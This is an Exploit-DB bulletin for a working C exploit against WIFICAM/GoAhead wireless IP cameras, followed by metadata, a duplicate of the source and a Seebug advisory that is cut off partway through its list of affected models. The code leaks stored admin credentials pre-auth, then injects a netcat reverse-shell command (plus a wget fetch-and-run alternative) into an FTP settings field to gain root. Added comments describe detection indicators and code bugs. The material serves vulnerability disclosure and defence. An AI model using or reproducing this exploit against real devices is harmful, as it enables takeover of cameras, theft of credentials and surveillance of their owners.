Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution
2017-03-08T00:00:00
ID EDB-ID:43142 Type exploitdb Reporter Exploit-DB Modified 2017-03-08T00:00:00
Description
Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution. CVE-2017-8221,CVE-2017-8222,CVE-2017-8223,CVE-2017-8224,CVE-2017-8225. Remote explo...
# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
/* TCP port of the camera's embedded web server; creds() and rce() connect to it. */
#define CAM_PORT 80
/*
 * Host and port that are spliced into the request templates below at compile
 * time. main() prints the same two values when it asks for a listener.
 */
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
/*
 * Request templates. rce() uses each one as a printf format; the two %s are
 * filled with the login and password that creds() extracted.
 *
 * PAYLOAD_0: set_ftp.cgi request whose `pwd` parameter holds a `$(...)` shell
 *            command substitution instead of a password (main() labels this
 *            step "planting").
 * PAYLOAD_1: ftptest.cgi request (main() labels it "executing"); presumably
 *            the firmware's FTP test hands the stored password to a shell --
 *            that behaviour is on the device and not visible in this file.
 * PAYLOAD_2: the same set_ftp.cgi request with a plain placeholder password,
 *            sent afterwards to overwrite the stored value ("cleaning").
 *
 * Detection notes: none of the templates carries an HTTP version or a Host
 * header, and the injected value always sits in the `pwd` query parameter of
 * set_ftp.cgi. A set_ftp.cgi request containing `$(` followed within about a
 * second by a ftptest.cgi request from the same client is the sequence this
 * file produces.
 */
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
/* Alternative templates; nothing in the code shown here references them. */
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
/* Forward declarations; both functions are defined after main(). */
char * creds(char *argv,
int get_config);
int rce(char *argv,
char *id,
char attack[],
char desc[]);
/*
 * main - drive the two stages: credential extraction, then four requests.
 *
 * argv[1] is the target address; creds() and rce() parse it with
 * inet_pton(AF_INET, ...), so only a dotted IPv4 literal is accepted.
 * argv[2], when it equals "--get-config", makes creds() dump the raw
 * response and exit the process. envp is unused.
 *
 * Returns 1 on usage error or when creds() returns NULL, 0 otherwise.
 *
 * NOTE(review): a 0 return from rce() only means send() reported no error.
 * No response is ever read, so the "done" lines and the final message say
 * nothing about what happened on the device; the final message is printed
 * unconditionally.
 */
int main(int argc,
char **argv,
char **envp)
{
/* 64-byte buffer from creds(): login at offset 0, password at offset 32. */
char *id;
printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
if (argc < 2)
{
printf("%s target\n", argv[0]);
printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
return (1);
}
if (argc == 2)
printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
/* Any third argument other than "--get-config" falls through to the else branch. */
if (argc == 3 && !strcmp(argv[2], "--get-config"))
id = creds(argv[1], 1);
else
id = creds(argv[1], 0);
if (id == NULL)
{
printf("exploit failed\n");
return (1);
}
printf("done\n");
/* The extracted credentials are written to stdout in clear text. */
printf(" login = %s\n", id);
printf(" pass = %s\n", id + 32);
/*
 * Request order as seen by the device: set_ftp.cgi, a one second pause,
 * ftptest.cgi, set_ftp.cgi again with a placeholder password, ftptest.cgi
 * again. Each call opens its own TCP connection.
 */
if (!rce(argv[1], id, PAYLOAD_0, "planting"))
printf("done\n");
sleep(1);
if (!rce(argv[1], id, PAYLOAD_1, "executing"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
printf("done\n");
printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
/* id is not freed; the process ends here. */
return (0);
}
/*
 * creds - request /system.ini from the camera with empty loginuse/loginpas
 * parameters and pull the stored login and password out of the binary
 * response. The bulletin text on this page lists this pre-auth information
 * leak as CVE-2017-8225.
 *
 * argv:       target address as a dotted IPv4 string (parsed with inet_pton).
 * get_config: non-zero prints the received bytes to stdout and calls exit(0)
 *             instead of returning.
 *
 * Returns a calloc'd 64-byte buffer owned by the caller (login at offset 0,
 * password at offset 32), or NULL on any failure.
 *
 * Detection: the request line is fixed,
 * "GET /system.ini?loginuse&loginpas HTTP/1.0", so a request for system.ini
 * with valueless loginuse and loginpas parameters is a direct log or IDS
 * indicator for this stage.
 *
 * NOTE(review): the failure returns after socket() leave sock open, tmp is
 * leaked when the calloc of out fails, and out is leaked when the marker is
 * not found.
 */
char * creds(char *argv,
int get_config)
{
int sock;
int n;
struct sockaddr_in serv_addr;
char buf[8192] = { 0 };
char *out;
char *tmp;
char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
int old_n;
int n_total;
sock = 0;
n = 0;
old_n = 0;
n_total = 0;
printf("[+] bypassing auth ... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (NULL);
}
/*
 * NOTE(review): this fills the struct with the character '0' (0x30), not
 * with zero bytes. sin_family and sin_port are assigned below and sin_addr
 * is written by inet_pton; any remaining bytes keep 0x30.
 */
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (NULL);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("creds: connect failed\n");
return (NULL);
}
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("creds: send failed\n");
return (NULL);
}
/* tmp collects up to 10 KiB of the response; it is not zero-initialised. */
if (!(tmp = malloc(10 * 1024 * sizeof(char))))
return (NULL);
/* out is zero-filled, so both 32-byte slots start as empty strings. */
if (!(out = calloc(64, sizeof(char))))
return (NULL);
/*
 * Read until the peer closes the connection. A chunk is copied only while
 * the running total stays below 10 KiB.
 * NOTE(review): old_n holds the size of the previous chunk, not a running
 * offset, so from the third chunk on data is written over earlier bytes
 * instead of being appended. The `n >= 0` test is always true here because
 * the loop condition already requires n > 0.
 */
while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
{
n_total += n;
if (n_total < 1024 * 10)
memcpy(tmp + old_n, buf, n);
if (n >= 0)
old_n = n;
}
close(sock);
/*
[ HTTP HEADERS ]
...
000????: 0000 0a0a 0a0a 01.. .... .... .... ....
^^^^ ^^^^ ^^
Useful reference in the binary data
in order to find the positions of
credentials
...
...
0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
...
NOTE: the reference can also be:
000????: 0006 0606 0606 0100 000a .... .... ....
Other method: parse everything, find the "admin" string and extract the associated password
by adding 31 bytes after the address of 'a'[dmin].
Works if the login is admin (seems to be the default, but can be changed by the user)
*/
if (get_config)
{
/* j is unsigned and n_total is int, so this comparison mixes signedness. */
for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
printf("%c", tmp[j]);
exit (0);
}
/*
 * Look for the byte marker 0a 0a 0a 0a 01; the login is read 138 bytes and
 * the password 170 bytes after the marker's last byte.
 * NOTE(review): the scan covers the whole 10 KiB regardless of n_total, so
 * bytes past the received data are indeterminate malloc contents.
 */
for (unsigned int j = 50; j < 10 * 1024; j++)
{
if (tmp[j - 4] == 0x0a &&
tmp[j - 3] == 0x0a &&
tmp[j - 2] == 0x0a &&
tmp[j - 1] == 0x0a &&
tmp[j] == 0x01)
{
if (j + 170 < 10 * 1024)
{
/*
 * NOTE(review): strcat stops only at a NUL byte in the response. Nothing
 * limits either copy to its 32-byte slot of out or to the end of tmp, so
 * the remote data is trusted to be well-formed.
 */
strcat(out, &tmp[j + 138]);
strcat(out + 32 * sizeof(char), &tmp[j + 170]);
free(tmp);
return (out);
}
}
}
free(tmp);
return (NULL);
}
/*
 * rce - fill one request template with the extracted credentials and send it
 * to the camera over a new TCP connection.
 *
 * argv:   target address as a dotted IPv4 string (parsed with inet_pton).
 * id:     64-byte buffer from creds(); login at id, password at id + 32.
 * attack: printf-style template with two %s conversions (the PAYLOAD_*
 *         macros in this file).
 * desc:   label printed in the progress message.
 *
 * Returns 0 when send() reported no error, 1 on any failure. The response is
 * never read, so 0 does not show how the device handled the request.
 *
 * NOTE(review): payload is never freed and sock is never closed, on either
 * the success or the failure paths.
 */
int rce(char *argv,
char *id,
char attack[],
char desc[])
{
int sock;
struct sockaddr_in serv_addr;
char *payload;
/* 512-byte zero-filled buffer for the formatted request. */
if (!(payload = calloc(512, sizeof(char))))
return (1);
sock = 0;
printf("[+] %s payload ... ", desc);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (1);
}
/*
 * NOTE(review): fills the struct with the character '0' (0x30), not zero
 * bytes; the fields that matter are assigned below and by inet_pton.
 */
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (1);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("rce: connect failed\n");
return (1);
}
/*
 * NOTE(review): attack is used as the format string and sprintf has no
 * length limit; the result must fit in the 512 bytes allocated above. The
 * credentials are inserted as-is, without URL encoding.
 */
sprintf(payload, attack, id, id + 32);
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("rce: send failed\n");
return (1);
}
return (0);
}
{"id": "EDB-ID:43142", "hash": "8461a0c3eee8e49fa30f9a1137529c32", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution", "description": "Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution. CVE-2017-8221,CVE-2017-8222,CVE-2017-8223,CVE-2017-8224,CVE-2017-8225. Remote explo...", "published": "2017-03-08T00:00:00", "modified": "2017-03-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/43142/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-8221", "CVE-2017-8222", "CVE-2017-8224", "CVE-2017-8223", "CVE-2017-8225"], "lastseen": "2017-11-14T16:32:36", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-11-14T16:32:36"}, "dependencies": {"references": [{"type": "seebug", "idList": ["SSV:92748"]}, {"type": "zdt", "idList": ["1337DAY-ID-29003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106636"]}, {"type": "cve", "idList": ["CVE-2017-8224", "CVE-2017-8222", "CVE-2017-8223", "CVE-2017-8225", "CVE-2017-8221"]}, {"type": "threatpost", "idList": ["THREATPOST:D2E45A61AF79D195D55671053FCCC5BA", "THREATPOST:31CC1BF1652AEA543504AB09594E8DAB"]}, {"type": "thn", "idList": ["THN:F659F177E9871AC527A9D7C561D7ABDF"]}, {"type": "nessus", "idList": ["GOAHEAD_PASSWORD_LEAK.NASL"]}], "modified": "2017-11-14T16:32:36"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/43142/", "sourceData": "# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c\r\n# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include 
<sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n \r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n 
printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... 
....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... 
\", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"seebug": [{"lastseen": "2017-11-19T12:01:14", "bulletinFamily": "exploit", "description": "## Product Description\r\n\r\nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which allows to stream remotely.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed with a lot of vulnerabilities. This camera is very similar to a lot of other Chinese cameras.\r\n\r\nIt seems that a generic camera is being sold by a Chinese company in bulk (OEM) and the buyer companies resell them with custom software development and specific branding. Wireless IP Camera (P2) WIFICAM is one of the branded cameras.\r\n\r\nSo, cameras are sold under different names, brands and functions. The HTTP interface is different for each vendor but shares the same vulnerabilities.\r\n\r\nBecause of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), **which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability**.\r\n\r\nThe summary of the vulnerabilities is:\r\n\r\n1. [CVE-2017-8224 - Backdoor account](#backdoor-account)\r\n2. [CVE-2017-8222 - RSA key and certificates](#rsa-lulz)\r\n3. [CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server](#pre-auth-info-leak-goahead)\r\n4. [Authenticated RCE as root](#root-rce)\r\n5. [Pre-Auth RCE as root](#pre-auth-root-rce)\r\n6. [CVE-2017-8223 - Misc - Streaming without authentication](#open-streaming)\r\n7. [CVE-2017-8221 - Misc - \"Cloud\" (Aka Botnet)](#cloud)\r\n\r\n**The vulnerabilities in the Cloud management affect a lot of P2P or \"Cloud\" cameras.**\r\n\r\n**My tests have shown that the InfoLeak affecting the GoAhead server running on the camera affects at least 1250+ camera models. It can be used to execute the RCE as root. 
Thus, these cameras are likely affected by a pre-auth RCE as root:**\r\n\r\n```\r\n3G+IPCam Other\r\n3SVISION Other\r\n3com CASA\r\n3com Other\r\n3xLogic Other\r\n3xLogic Radio\r\n4UCAM Other\r\n4XEM Other\r\n555 Other\r\n7Links 3677\r\n7Links 3677-675\r\n7Links 3720-675\r\n7Links 3720-919\r\n7Links IP-Cam-in\r\n7Links IP-Wi-Fi\r\n7Links IPC-760HD\r\n7Links IPC-770HD\r\n7Links Incam\r\n7Links Other\r\n7Links PX-3615-675\r\n7Links PX-3671-675\r\n7Links PX-3720-675\r\n7Links PX3309\r\n7Links PX3615\r\n7Links ipc-720\r\n7Links px-3675\r\n7Links px-3719-675\r\n7Links px-3720-675\r\nA4Tech Other\r\nABS Other\r\nADT RC8021W\r\nAGUILERA AQUILERA\r\nAJT AJT-019129-BBCEF\r\nALinking ALC\r\nALinking Other\r\nALinking dax\r\nAMC Other\r\nANRAN ip180\r\nAPKLINK Other\r\nAQUILA AV-IPE03\r\nAQUILA AV-IPE04\r\nAVACOM 5060\r\nAVACOM 5980\r\nAVACOM H5060W\r\nAVACOM NEW\r\nAVACOM Other\r\nAVACOM h5060w\r\nAVACOM h5080w\r\nAcromedia IN-010\r\nAcromedia Other\r\nAdvance Other\r\nAdvanced+home lc-1140\r\nAeoss J6358\r\nAetos 400w\r\nAgasio A500W\r\nAgasio A502W\r\nAgasio A512\r\nAgasio A533W\r\nAgasio A602W\r\nAgasio A603W\r\nAgasio Other\r\nAirLink Other\r\nAirmobi HSC321\r\nAirsight Other\r\nAirsight X10\r\nAirsight X34A\r\nAirsight X36A\r\nAirsight XC39A\r\nAirsight XX34A\r\nAirsight XX36A\r\nAirsight XX40A\r\nAirsight XX60A\r\nAirsight x10\r\nAirsight x10Airsight\r\nAirsight xc36a\r\nAirsight xc49a\r\nAirsight xx39A\r\nAirsight xx40a\r\nAirsight xx49a\r\nAirsight xx51A\r\nAirsight xx51a\r\nAirsight xx52a\r\nAirsight xx59a\r\nAirsight xx60a\r\nAkai AK7400\r\nAkai SP-T03WP\r\nAlecto 150\r\nAlecto Atheros\r\nAlecto DVC-125IP\r\nAlecto DVC-150-IP\r\nAlecto DVC-1601\r\nAlecto DVC-215IP\r\nAlecto DVC-255-IP\r\nAlecto dv150\r\nAlecto dvc-150ip\r\nAlfa 0002HD\r\nAlfa Other\r\nAllnet 2213\r\nAllnet ALL2212\r\nAllnet ALL2213\r\nAmovision Other\r\nAndroid+IP+cam IPwebcam\r\nAnjiel ip-sd-sh13d\r\nApexis AH9063CW\r\nApexis APM-H803-WS\r\nApexis APM-H804-WS\r\nApexis APM-J011\r\nApexis 
APM-J011-Richard\r\nApexis APM-J011-WS\r\nApexis APM-J012\r\nApexis APM-J012-WS\r\nApexis APM-J0233\r\nApexis APM-J8015-WS\r\nApexis GENERIC\r\nApexis H\r\nApexis HD\r\nApexis J\r\nApexis Other\r\nApexis PIPCAM8\r\nApexis Pyle\r\nApexis XF-IP49\r\nApexis apexis\r\nApexis apm-\r\nApexis dealextreme\r\nAquila+Vizion Other\r\nArea51 Other\r\nArmorView Other\r\nAsagio A622W\r\nAsagio Other\r\nAsgari 720U\r\nAsgari Other\r\nAsgari PTG2\r\nAsgari UIR-G2\r\nAtheros ar9285\r\nAvantGarde SUMPPLE\r\nAxis 1054\r\nAxis 241S\r\nB-Qtech Other\r\nB-Series B-1\r\nBRAUN HD-560\r\nBRAUN HD505\r\nBeaulieu Other\r\nBionics Other\r\nBionics ROBOCAM\r\nBionics Robocam\r\nBionics T6892WP\r\nBionics t6892wp\r\nBlack+Label B2601\r\nBravolink Other\r\nBreno Other\r\nCDR+king APM-J011-WS\r\nCDR+king Other\r\nCDR+king SEC-015-C\r\nCDR+king SEC-016-NE\r\nCDR+king SEC-028-NE\r\nCDR+king SEC-029-NE\r\nCDR+king SEC-039-NE\r\nCDR+king sec-016-ne\r\nCDXX Other\r\nCDXXcamera Any\r\nCP+PLUS CP-EPK-HC10L1\r\nCPTCAM Other\r\nCamscam JWEV-372869-BCBAB\r\nCasa Other\r\nCengiz Other\r\nChinavasion Gunnie\r\nChinavasion H30\r\nChinavasion IP611W\r\nChinavasion Other\r\nChinavasion ip609aw\r\nChinavasion ip611w\r\nCloud MV1\r\nCloud Other\r\nCnM IP103\r\nCnM Other\r\nCnM sec-ip-cam\r\nCompro NC150/420/500\r\nComtac CS2\r\nComtac CS9267\r\nConceptronic CIPCAM720PTIWL\r\nConceptronic cipcamptiwl\r\nCybernova Other\r\nCybernova WIP604\r\nCybernova WIP604MW\r\nD-Link DCS-910\r\nD-Link DCS-930L\r\nD-Link L-series\r\nD-Link Other\r\nDB+Power 003arfu\r\nDB+Power DBPOWER\r\nDB+Power ERIK\r\nDB+Power HC-WV06\r\nDB+Power HD011P\r\nDB+Power HD012P\r\nDB+Power HD015P\r\nDB+Power L-615W\r\nDB+Power LA040\r\nDB+Power Other\r\nDB+Power Other2\r\nDB+Power VA-033K\r\nDB+Power VA0038K\r\nDB+Power VA003K+\r\nDB+Power VA0044_M\r\nDB+Power VA033K\r\nDB+Power VA033K+\r\nDB+Power VA035K\r\nDB+Power VA036K\r\nDB+Power VA038\r\nDB+Power VA038k\r\nDB+Power VA039K\r\nDB+Power VA039K-Test\r\nDB+Power VA040\r\nDB+Power 
VA390k\r\nDB+Power b\r\nDB+Power b-series\r\nDB+Power extcams\r\nDB+Power eye\r\nDB+Power kiskFirstCam\r\nDB+Power va033k\r\nDB+Power va039k\r\nDB+Power wifi\r\nDBB IP607W\r\nDEVICECLIENTQ CNB\r\nDKSEG Other\r\nDNT CamDoo\r\nDVR DVR\r\nDVS-IP-CAM Other\r\nDVS-IP-CAM Outdoor/IR\r\nDagro DAGRO-003368-JLWYX\r\nDagro Other\r\nDericam H216W\r\nDericam H502W\r\nDericam M01W\r\nDericam M2/6/8\r\nDericam M502W\r\nDericam M601W\r\nDericam M801W\r\nDericam Other\r\nDigix Other\r\nDigoo BB-M2\r\nDigoo MM==BB-M2\r\nDigoo bb-m2\r\nDinon 8673\r\nDinon 8675\r\nDinon SEGEV-105\r\nDinon segev-103\r\nDome Other\r\nDrilling+machines Other\r\nE-Lock 1000\r\nENSIDIO IP102W\r\nEOpen Open730\r\nEST ES-IP602IW\r\nEST IP743W\r\nEST Other\r\nEZCam EPK-EP10L1\r\nEZCam EZCam\r\nEZCam Other\r\nEZCam PAN/TILT\r\nEZCam Pan/Tilt\r\nEasyCam EC-101HD\r\nEasyCam EC-101HDSD\r\nEasyCam EC-101SD\r\nEasyCam EC-102\r\nEasyCam Other\r\nEasyN 187\r\nEasyN 1BF\r\nEasyN 720P\r\nEasyN F\r\nEasyN F-136\r\nEasyN F-M136\r\nEasyN F-M166\r\nEasyN F-M181\r\nEasyN F-M1b1\r\nEasyN F-SERIES\r\nEasyN F133\r\nEasyN 